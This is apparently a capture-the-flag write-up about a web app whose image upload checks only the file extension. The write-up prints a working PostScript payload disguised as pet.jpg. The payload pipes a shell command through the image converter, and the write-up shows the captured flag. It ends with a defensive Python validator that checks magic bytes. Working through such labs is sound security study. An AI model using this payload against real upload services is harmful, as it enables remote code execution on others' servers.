http://188.166.169.77:30148
From the application code:
ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])
Test uploads of png, jpg, and jpeg files succeed.
Since only the extension is checked and not the file content, this gives remote code execution on the website via a file with a jpg/png/jpeg extension.
pet.jpg:
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%cat flag >> /app/application/static/petpets/flag.txt) currentdevice putdeviceprops
Upload it, then fetch:
http://188.166.169.77:30148/static/petpets/flag.txt
HTB{c0mfy_bzzzzz_rcb33s_v1b3s}
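The check the application was missing, added here as an example (not the challenge's own code): besides the extension whitelist, verify that the uploaded bytes actually look like the declared image type, so a PostScript file named pet.jpg is rejected before any image library touches it. The function name, the reason strings and the sample inputs are constructed for this example.

```python
# Added example, not code from the challenge: validate an upload by its
# leading bytes as well as its extension. ALLOWED_EXTENSIONS mirrors the
# whitelist shown on the page; everything else here is constructed.
import os

ALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg'}

# Signatures a file of each allowed type must start with.
MAGIC = {
    'png': (b'\x89PNG\r\n\x1a\n',),
    'jpg': (b'\xff\xd8\xff',),
    'jpeg': (b'\xff\xd8\xff',),
}

# A PostScript/EPS file announces itself with this header; image
# converters may hand such content to a PostScript interpreter.
POSTSCRIPT_HEADER = b'%!PS'


def validate_upload(filename: str, data: bytes):
    """Return (accepted, reason) for an uploaded file.

    Order of checks: extension whitelist, explicit PostScript rejection,
    then the magic bytes of the declared type. Extension-only validation
    (the page's ALLOWED_EXTENSIONS check) passes all three sample files
    below; this function accepts only the two real images.
    """
    ext = os.path.splitext(filename)[1].lower().lstrip('.')
    if ext not in ALLOWED_EXTENSIONS:
        return False, 'extension not allowed'
    if data.lstrip().startswith(POSTSCRIPT_HEADER):
        return False, 'PostScript content rejected'
    if not any(data.startswith(sig) for sig in MAGIC[ext]):
        return False, 'content does not match declared type'
    return True, 'ok'


if __name__ == '__main__':
    # Constructed samples: a minimal PNG header, a minimal JPEG header,
    # and the header of the PostScript payload shown above, renamed .jpg.
    samples = {
        'cat.png': b'\x89PNG\r\n\x1a\n' + b'\x00' * 16,
        'cat.jpeg': b'\xff\xd8\xff\xe0' + b'\x00' * 16,
        'pet.jpg': b'%!PS-Adobe-3.0 EPSF-3.0\n%%BoundingBox: -0 -0 100 100\n',
    }
    for name, content in samples.items():
        print(name, validate_upload(name, content))
```

Magic-byte checks are defence in depth, not a complete fix: the converter that processes uploads should also be configured so it cannot interpret PostScript at all.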